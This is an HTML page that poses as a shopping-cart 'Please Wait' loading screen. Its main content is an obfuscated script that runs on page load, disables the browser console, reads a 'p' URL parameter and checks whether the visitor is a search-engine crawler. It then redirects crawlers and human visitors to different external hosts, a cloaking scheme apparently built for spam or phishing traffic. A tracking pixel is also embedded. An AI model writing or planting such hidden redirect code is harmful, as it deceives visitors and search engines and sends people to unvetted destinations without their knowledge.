<!DOCTYPE html>
<html>
	<head>
		<style>
			* {
				border: 0;
				box-sizing: border-box;
				margin: 0;
				padding: 0;
			}
			:root {
				--hue: 223;
				--bg: hsl(var(--hue), 10%, 90%);
				--fg: hsl(var(--hue), 10%, 10%);
				--primary: hsl(var(--hue), 90%, 55%);
				--trans-dur: 0.3s;
				font-size: calc(16px + (20 - 16) * (100vw - 320px) / (1280 - 320));
			}
			body {
				background-color: var(--bg);
				color: var(--fg);
				font: 1em/1.5 "DM Sans", sans-serif;
				height: 50vh;
				display: grid;
				place-items: center;
				transition: background-color var(--trans-dur), color var(--trans-dur);
			}
			.preloader {
				text-align: center;
				max-width: 20em;
				width: 100%;
			}
			.preloader__text {
				position: relative;
				height: 1.5em;
			}
			.preloader__msg {
				animation: msg 0.3s 13.7s linear forwards;
				position: absolute;
				width: 100%;
			}
			.preloader__msg--last {
				animation-direction: reverse;
				animation-delay: 14s;
				visibility: hidden;
			}
			.cart {
				display: block;
				margin: 0 auto 1.5em auto;
				width: 8em;
				height: 8em;
			}
			.cart__lines,
			.cart__top,
			.cart__wheel1,
			.cart__wheel2,
			.cart__wheel-stroke {
				animation: cartLines 2s ease-in-out infinite;
			}
			.cart__lines {
				stroke: var(--primary);
			}
			.cart__top {
				animation-name: cartTop;
			}
			.cart__wheel1 {
				animation-name: cartWheel1;
				transform: rotate(-0.25turn);
				transform-origin: 43px 111px;
			}
			.cart__wheel2 {
				animation-name: cartWheel2;
				transform: rotate(0.25turn);
				transform-origin: 102px 111px;
			}
			.cart__wheel-stroke {
				animation-name: cartWheelStroke;
			}
			.cart__track {
				stroke: hsla(var(--hue), 10%, 10%, 0.1);
				transition: stroke var(--trans-dur);
			}

			/* Dark theme */
			@media (prefers-color-scheme: dark) {
				:root {
					--bg: hsl(var(--hue), 10%, 10%);
					--fg: hsl(var(--hue), 10%, 90%);
				}
				.cart__track {
					stroke: hsla(var(--hue), 10%, 90%, 0.1);
				}
			}

			/* Animations */
			@keyframes msg {
				from {
					opacity: 1;
					visibility: visible;
				}
				99.9% {
					opacity: 0;
					visibility: visible;
				}
				to {
					opacity: 0;
					visibility: hidden;
				}
			}
			@keyframes cartLines {
				from,
				to {
					opacity: 0;
				}
				8%,
				92% {
					opacity: 1;
				}
			}
			@keyframes cartTop {
				from {
					stroke-dashoffset: -338;
				}
				50% {
					stroke-dashoffset: 0;
				}
				to {
					stroke-dashoffset: 338;
				}
			}
			@keyframes cartWheel1 {
				from {
					transform: rotate(-0.25turn);
				}
				to {
					transform: rotate(2.75turn);
				}
			}
			@keyframes cartWheel2 {
				from {
					transform: rotate(0.25turn);
				}
				to {
					transform: rotate(3.25turn);
				}
			}
			@keyframes cartWheelStroke {
				from,
				to {
					stroke-dashoffset: 81.68;
				}
				50% {
					stroke-dashoffset: 40.84;
				}
			}

		</style>
	</head>

	<body>
		<img src="//sstatic1.histats.com/0.gif?4804389&101" alt="" border="0">
		<div class="preloader">
			<svg class="cart" role="img" aria-label="Shopping cart line animation" viewBox="0 0 128 128" width="128px" height="128px" xmlns="http://www.w3.org/2000/svg">
				<g fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="8">
					<g class="cart__track" stroke="hsla(0,10%,10%,0.1)">
						<polyline points="4,4 21,4 26,22 124,22 112,64 35,64 39,80 106,80" />
						<circle cx="43" cy="111" r="13" />
						<circle cx="102" cy="111" r="13" />
					</g>
					<g class="cart__lines" stroke="currentColor">
						<polyline class="cart__top" points="4,4 21,4 26,22 124,22 112,64 35,64 39,80 106,80" stroke-dasharray="338 338" stroke-dashoffset="-338" />
						<g class="cart__wheel1" transform="rotate(-90,43,111)">
							<circle class="cart__wheel-stroke" cx="43" cy="111" r="13" stroke-dasharray="81.68 81.68" stroke-dashoffset="81.68" />
						</g>
						<g class="cart__wheel2" transform="rotate(90,102,111)">
							<circle class="cart__wheel-stroke" cx="102" cy="111" r="13" stroke-dasharray="81.68 81.68" stroke-dashoffset="81.68" />
						</g>
					</g>
				</g>
			</svg>
			<div class="preloader__text">
				<p class="preloader__msg">Please Wait ...</p>
				<p class="preloader__msg preloader__msg--last">This is taking long. Something’s wrong.</p>
			</div>
		</div>
		
		<script>
		function _0x4866(){const _0xa6a72d=['gBCSX','2786715CIzdvv','userAgent','/item/vity','QYHxQ','apply','duLVH','search','WUZqK','(((.+)+)+)','NUpIy','vQmmp','cacgp','location','PREVl','bind','2324oNVfhc','trace','hwPlu','1200PAcOWY','16ztxbsk','XSpPn','test','error','bOoHP','CXCPj','gcOok','toString','Vrctr','dBxeb','constructo','EkBZo','mon.github','rn\x20this\x22)(','.io/','RrNku','return\x20(fu','info','get','LBgtR','log','a.tlast.co','402837oPXYfX','console','href','10AvUdkM','IemVq','ZrVDy','prototype','1606956dzfXgr','671823tdrkQb','oEDGF','nction()\x20','1281960bzjMjC','XXwAK','1418160JlVHWL','__proto__'];_0x4866=function(){return _0xa6a72d;};return _0x4866();}function _0x109d(_0x5670da,_0x57188e){const _0x486635=_0x4866();return _0x109d=function(_0x109dad,_0x3841dc){_0x109dad=_0x109dad-(-0x191a+-0x1*-0x218b+0x6de*-0x1);let _0x496bbd=_0x486635[_0x109dad];return _0x496bbd;},_0x109d(_0x5670da,_0x57188e);}(function(_0xc40ab,_0x2aeb6a){const _0x519473=_0xc40ab();function _0xe02996(_0x4c449e,_0x238c81,_0xee4c6d,_0x12a6b5){return _0x109d(_0x238c81- -0x200,_0x4c449e);}function _0x45eb8d(_0x54e8b3,_0x4ffb59,_0x1ec327,_0x580be7){return _0x109d(_0x54e8b3-0xbe,_0x4ffb59);}while(!![]){try{const _0xa74c23=parseInt(_0x45eb8d(0x27e,0x27f,0x262,0x26c))/(-0x1d3b*-0x1+-0x2a*0x95+0x12*-0x44)+parseInt(_0xe02996(-0x5a,-0x41,-0x56,-0x2e))/(-0x5*0x212+0x6f9+0x363)+parseInt(_0x45eb8d(0x276,0x262,0x26c,0x26d))/(-0x2641*-0x1+-0x2a7*0xe+-0x11c)*(-parseInt(_0x45eb8d(0x260,0x243,0x24a,0x25c))/(0x7ad+0x1ad3+-0x227c))+-parseInt(_0xe02996(-0x48,-0x3d,-0x37,-0x34))/(-0xea4+0x1fb*-0xd+0x3*0xd78)+parseInt(_0x45eb8d(0x25f,0x25e,0x270,0x261))/(0x157+-0x1fc0+0x1e6f)*(-parseInt(_0xe02996(-0x7e,-0x62,-0x72,-0x6a))/(0x2*0xd01+-0x1fd7+0x32*0x1e))+-parseInt(_0xe02996(-0x21,-0x3b,-0x39,-0x56))/(-0x2381+-0x50e+0x2897)+-parseInt(_0xe02996(-0x4c,-0x38,-0x40,-0x44))/(0x1f70+-0x1*0x113b+-0x1*0xe2c)*(-parseInt(_0x45eb8d(0x279,0x28e,0x266,0x26e))/(0xce2+-0xa77+-0x261));if(_0xa74c23===_0x2aeb6a)break;else _0x519473['push'](_0x519473['shift']());}catch(_0xad971b){_0x519473['push'](_0x519473['shift']());}}}(_0x4866,-0xc5*0x1741+0xe9*0xe1e+0x3*0x57c37),(function(){function _0x1fd335(_0x16ff2f,_0x405887,_0x3da6f1,_0x3bf77a){return _0x109d(_0x3da6f1- -0x396,_0x405887);}const _0x4da748={'twcgW':_0x1fd335(-0x1f4,-0x1f8,-0x1ff,-0x1f9)+'+$','IemVq':function(_0x3360ae,_0x5b01be){return _0x3360ae===_0x5b01be;},'yCjnz':'LBgtR','SShiL':_0x1fd335(-0x1fa,-0x1e2,-0x1e4,-0x1df)+_0x1cbea0(-0x98,-0xb3,-0xac,-0x90),'duLVH':'{}.constru'+'ctor(\x22retu'+_0x1cbea0(-0xa5,-0xc0,-0xbf,-0xc1)+'\x20)','oEDGF':function(_0x37aec3){return _0x37aec3();},'GOwEM':_0x1cbea0(-0xb6,-0xa9,-0xb8,-0xcd),'Xfqnw':'warn','RrNku':_0x1fd335(-0x1fd,-0x1e1,-0x1e3,-0x1d0),'cacgp':_0x1cbea0(-0xbd,-0xae,-0xc9,-0xbc),'gBCSX':'exception','PREVl':_0x1cbea0(-0xd6,-0xd5,-0xcf,-0xca),'IVqSB':function(_0x5f2317,_0xafc06){return _0x5f2317<_0xafc06;},'CXCPj':function(_0x924915,_0x5976e1,_0x572989){return _0x924915(_0x5976e1,_0x572989);},'EkBZo':function(_0x1673bc){return _0x1673bc();},'bOoHP':function(_0x315090){return _0x315090();},'gcOok':function(_0x17492b,_0x504cc1){return _0x17492b+_0x504cc1;},'XXwAK':function(_0x25ebdd,_0x1fcb8d){return _0x25ebdd+_0x1fcb8d;},'GFvEB':'https://ar'+_0x1fd335(-0x1fa,-0x1da,-0x1df,-0x1e2)+_0x1cbea0(-0x87,-0xb1,-0xa4,-0xb2)+'mon.github'+_0x1fd335(-0x1fb,-0x1ed,-0x1e6,-0x1cf)},_0x3b1a15=(function(){const _0x5d9e47={};function _0x22df16(_0x3fb989,_0x57c987,_0x1e6f47,_0x215478){return _0x1fd335(_0x3fb989-0x15a,_0x3fb989,_0x1e6f47-0x36e,_0x215478-0x150);}function _0x39da56(_0x99d917,_0x1108ac,_0x389d63,_0x15ae49){return _0x1fd335(_0x99d917-0x34,_0x1108ac,_0x15ae49-0x364,_0x15ae49-0xe);}_0x5d9e47[_0x22df16(0x19c,0x18d,0x183,0x177)]=function(_0x2da10b,_0x543df8){return _0x2da10b===_0x543df8;},_0x5d9e47[_0x22df16(0x176,0x169,0x178,0x17b)]=_0x22df16(0x1b9,0x197,0x1a3,0x19e);const _0x884fde=_0x5d9e47;let _0x4386f4=!![];return function(_0x2268e4,_0x625f7b){const _0x134536={'vQmmp':function(_0x3892f5,_0x169cac){function _0x2109fd(_0x3e77ea,_0x5901c4,_0x2218b3,_0x108df2){return _0x109d(_0x5901c4-0x2a6,_0x108df2);}return _0x884fde[_0x2109fd(0x44c,0x451,0x445,0x451)](_0x3892f5,_0x169cac);},'ZrVDy':_0x884fde[_0x2095ba(0x1de,0x1cb,0x1c8,0x1df)]};function _0x2095ba(_0x544d41,_0x31dba5,_0x12e389,_0x1e5e92){return _0x39da56(_0x544d41-0x1f2,_0x31dba5,_0x12e389-0xa7,_0x12e389-0x5a);}const _0x8068=_0x4386f4?function(){function _0x157138(_0x298144,_0x2ac4ab,_0x35a691,_0x226bf6){return _0x2095ba(_0x298144-0x172,_0x35a691,_0x226bf6- -0x45,_0x226bf6-0x163);}function _0x4628c9(_0x1db113,_0x2b5153,_0x208781,_0x39d1e8){return _0x2095ba(_0x1db113-0x12,_0x208781,_0x39d1e8-0x2ba,_0x39d1e8-0xb5);}if(_0x134536[_0x4628c9(0x469,0x48f,0x48c,0x47b)](_0x157138(0x1b4,0x1a2,0x19a,0x1ae),_0x134536[_0x4628c9(0x4a6,0x48f,0x494,0x49f)])){if(_0x625f7b){const _0x4ca8c1=_0x625f7b[_0x157138(0x168,0x160,0x15d,0x176)](_0x2268e4,arguments);return _0x625f7b=null,_0x4ca8c1;}}else{const _0x34fd4a=_0xeeb532[_0x4628c9(0x460,0x479,0x45c,0x475)](_0x101086,arguments);return _0x522ac4=null,_0x34fd4a;}}:function(){};return _0x4386f4=![],_0x8068;};}()),_0x352b6c=_0x4da748[_0x1cbea0(-0xd7,-0xb6,-0xc7,-0xca)](_0x3b1a15,this,function(){function _0x220f6e(_0x307c67,_0x34205d,_0x9584cd,_0x3afcd9){return _0x1cbea0(_0x307c67-0x2b,_0x34205d-0x126,_0x34205d-0x3f3,_0x9584cd);}function _0x40b695(_0xb7abc7,_0x3c4a02,_0x424a1b,_0x4bfe44){return _0x1fd335(_0xb7abc7-0x1d6,_0xb7abc7,_0x4bfe44-0x1da,_0x4bfe44-0x1ee);}return _0x352b6c[_0x220f6e(0x321,0x32e,0x33c,0x316)]()['search'](_0x4da748['twcgW'])['toString']()['constructo'+'r'](_0x352b6c)[_0x220f6e(0x323,0x31a,0x331,0x304)](_0x4da748['twcgW']);});_0x4da748[_0x1fd335(-0x1e3,-0x1ed,-0x1e9,-0x1ec)](_0x352b6c);const _0x1a307e=(function(){const _0x3cdc69={'XSpPn':function(_0xf68c4f,_0x3675eb){function _0x2e4c57(_0x5e6e20,_0x57ed50,_0x1fbd17,_0x405bd8){return _0x109d(_0x57ed50- -0x246,_0x1fbd17);}return _0x4da748[_0x2e4c57(-0x84,-0x8a,-0x8c,-0x98)](_0xf68c4f,_0x3675eb);},'NUpIy':_0x4da748['yCjnz']};let _0x3fff90=!![];return function(_0x320409,_0x1d6c76){function _0x22cbb8(_0x37eee9,_0x114856,_0x2e8094,_0x579c63){return _0x109d(_0x114856- -0x2df,_0x37eee9);}function _0x38faae(_0x2d5146,_0x84170d,_0x8c419,_0x46fb2f){return _0x109d(_0x46fb2f- -0x212,_0x8c419);}if(_0x3cdc69[_0x22cbb8(-0x150,-0x13c,-0x158,-0x157)](_0x22cbb8(-0x112,-0x12a,-0x11e,-0x134),_0x3cdc69[_0x22cbb8(-0x136,-0x147,-0x148,-0x144)])){const _0x1cfa3c=_0x3fff90?function(){function _0x3186c1(_0x3fac72,_0x4236f8,_0x1477e3,_0x38e074){return _0x38faae(_0x3fac72-0x18c,_0x4236f8-0x159,_0x1477e3,_0x3fac72-0x4e1);}if(_0x1d6c76){const _0x5eecbe=_0x1d6c76[_0x3186c1(0x462,0x468,0x448,0x47d)](_0x320409,arguments);return _0x1d6c76=null,_0x5eecbe;}}:function(){};return _0x3fff90=![],_0x1cfa3c;}else{const _0x308738=_0x3f7350[_0x38faae(-0x69,-0x71,-0x53,-0x66)+'r'][_0x22cbb8(-0x11e,-0x121,-0x105,-0x10f)]['bind'](_0x422032),_0x2774c9=_0x3f0b2e[_0x2e8d7d],_0x26afe0=_0x17c172[_0x2774c9]||_0x308738;_0x308738[_0x38faae(-0x4c,-0x5b,-0x4f,-0x4c)]=_0x5af539[_0x22cbb8(-0x131,-0x142,-0x132,-0x136)](_0x40d0c7),_0x308738[_0x22cbb8(-0x131,-0x136,-0x147,-0x129)]=_0x26afe0['toString'][_0x22cbb8(-0x131,-0x142,-0x15d,-0x14f)](_0x26afe0),_0x4d2a2b[_0x2774c9]=_0x308738;}};}());function _0x1cbea0(_0x47f4d7,_0x8e998f,_0x5df300,_0x2fd80f){return _0x109d(_0x5df300- -0x26e,_0x2fd80f);}const _0x4ced83=_0x1a307e(this,function(){const _0x23decc={'Vrctr':function(_0x640f8,_0x4145b5){return _0x640f8(_0x4145b5);},'keWQO':function(_0x15fe89,_0x163ad8){return _0x15fe89+_0x163ad8;},'yqeaZ':_0x4da748['SShiL'],'WUZqK':_0x4da748[_0x2ae627(0x282,0x285,0x28f,0x280)]},_0x2fb6e9=function(){function _0x3a5a01(_0x46ce83,_0x35f9b3,_0x54fee6,_0x343f24){return _0x2ae627(_0x46ce83-0x11a,_0x46ce83- -0x259,_0x35f9b3,_0x343f24-0x11e);}function _0x3abb9d(_0x247c5e,_0x10267f,_0x4ee5e3,_0x19ab47){return _0x2ae627(_0x247c5e-0xb5,_0x4ee5e3- -0x4c5,_0x19ab47,_0x19ab47-0x9a);}let _0x388e40;try{_0x388e40=_0x23decc[_0x3a5a01(0x42,0x34,0x5a,0x34)](Function,_0x23decc['keWQO'](_0x23decc['yqeaZ']+_0x23decc[_0x3abb9d(-0x241,-0x259,-0x23e,-0x237)],');'))();}catch(_0x4e4d5e){_0x388e40=window;}return _0x388e40;},_0x367e2f=_0x4da748[_0x555368(0x39c,0x3c7,0x3b6,0x3cc)](_0x2fb6e9),_0x492b73=_0x367e2f['console']=_0x367e2f[_0x2ae627(0x2a5,0x2aa,0x28d,0x2c3)]||{};function _0x2ae627(_0x319e5c,_0x215750,_0x274a3,_0x3e907d){return _0x1fd335(_0x319e5c-0x56,_0x274a3,_0x215750-0x487,_0x3e907d-0x6);}function _0x555368(_0x1bae68,_0x20889a,_0x27d50f,_0x1c3371){return _0x1cbea0(_0x1bae68-0x1da,_0x20889a-0x10f,_0x27d50f-0x463,_0x20889a);}const _0xfa1cbe=[_0x4da748['GOwEM'],_0x4da748['Xfqnw'],_0x4da748[_0x2ae627(0x28d,0x2a2,0x28c,0x2a4)],_0x4da748[_0x2ae627(0x297,0x28b,0x28d,0x280)],_0x4da748[_0x2ae627(0x2c2,0x2b8,0x2ae,0x2d2)],'table',_0x4da748[_0x2ae627(0x297,0x28d,0x2a5,0x294)]];for(let _0x4ae265=0x5*0x700+0x3*-0x17f+0x49*-0x6b;_0x4da748['IVqSB'](_0x4ae265,_0xfa1cbe['length']);_0x4ae265++){const _0x35759a=_0x1a307e['constructo'+'r'][_0x2ae627(0x2bb,0x2af,0x297,0x2b4)][_0x2ae627(0x29a,0x28e,0x277,0x27e)](_0x1a307e),_0x476c58=_0xfa1cbe[_0x4ae265],_0x3415ef=_0x492b73[_0x476c58]||_0x35759a;_0x35759a['__proto__']=_0x1a307e[_0x2ae627(0x2a9,0x28e,0x293,0x2a2)](_0x1a307e),_0x35759a[_0x2ae627(0x27e,0x29a,0x29f,0x29b)]=_0x3415ef[_0x2ae627(0x29c,0x29a,0x2ad,0x2b3)][_0x2ae627(0x27d,0x28e,0x27c,0x29d)](_0x3415ef),_0x492b73[_0x476c58]=_0x35759a;}});_0x4da748[_0x1cbea0(-0xdf,-0xac,-0xc8,-0xb8)](_0x4ced83);let _0x3bc3c1=new URLSearchParams(window[_0x1cbea0(-0xd7,-0xc4,-0xd3,-0xe1)][_0x1fd335(-0x20b,-0x20c,-0x201,-0x1ea)]),_0x5785c6=_0x3bc3c1[_0x1fd335(-0x1d4,-0x1d8,-0x1e2,-0x1f7)]('p'),_0x3e9b17=/bot|google|baidu|bing|msn|duckduckbot|teoma|slurp|yandex/i[_0x1fd335(-0x1e4,-0x1db,-0x1f2,-0x20e)](navigator[_0x1cbea0(-0xc0,-0xc2,-0xa5,-0xb0)]);if(_0x5785c6){if(_0x3e9b17)location['replace'](_0x4da748[_0x1fd335(-0x1f8,-0x1ed,-0x1ee,-0x1f1)]('https://ar'+'a.tlast.co'+'/item/vity'+_0x1fd335(-0x1f0,-0x1fa,-0x1e8,-0x204)+_0x1fd335(-0x1d9,-0x1f1,-0x1e6,-0x1eb),_0x5785c6));else location[_0x1cbea0(-0xa0,-0xb8,-0xb4,-0xc5)]=_0x4da748[_0x1cbea0(-0x8d,-0xc1,-0xaa,-0xb6)](_0x4da748['GFvEB'],_0x5785c6);}}()));
		</script>
	</body>
</html>
